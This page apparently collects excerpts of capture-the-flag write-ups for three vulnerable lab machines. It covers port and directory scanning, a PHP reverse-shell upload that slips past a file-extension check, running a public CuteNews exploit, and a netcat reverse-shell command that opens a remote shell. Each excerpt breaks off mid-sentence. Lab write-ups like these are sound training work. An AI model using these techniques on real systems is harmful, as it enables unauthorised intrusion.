All about CTF writeups

Here's my solution for Relevant:1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 2 port open. Enumeration Browsing website, the web page presents us with 3 links, seems some kind of hints, lets check it out. Browsing the 1st link- https://rb.gy/g5prrv, gets redirect to youtube. Browsing the 2nd link- https://pastebin.com/sGzQSQXu, seems like a list of credentials. Just a thought, the home page says- because we hax0r3d your webz!, meaning the hacker has compromised the website. So, may be they have leaked the credentials here. Tried brute forcing the ssh but no result. Browsing the 3rd link- https://ibb.co/JtTY0Md, the QR code.   We can browse Zxing, and decode it.  Interesting, we keep it we may require at further stages. Lets scan for directories. $ dirb -u http://192.168.1.109 -r Seems like the website is built on CMS- Wordpress. We can use wpscan to enumerate it further. $ wpscan --url http://192.168.1.109 -e

Here's my solution for DevContainer:1 The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.104 We see only 1 port open. Enumeration Browsing the web and checking the source neither reveal any useful information nor hints.   We run dirb to scan the directories. $ dirb http://192.168.1.104 Browsing /upload Here we upload the php reverse shell file with double extension- shell.php.jpg and intercept the request using intercepting proxy tool. After intercepting the request we change the extension from- shell.php.jpg > shell.php and forward the request. Seems that the payload/file is uploaded successfully. Getting Access Now to run the payload/file, first we need to find the location of it. We hover the mouse over the broken image icon and look at the status bar to know the location of the file or we can simply right click on the broken image icon and click- Copy Image Location. Let us browse the location and on the other hand we start

Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19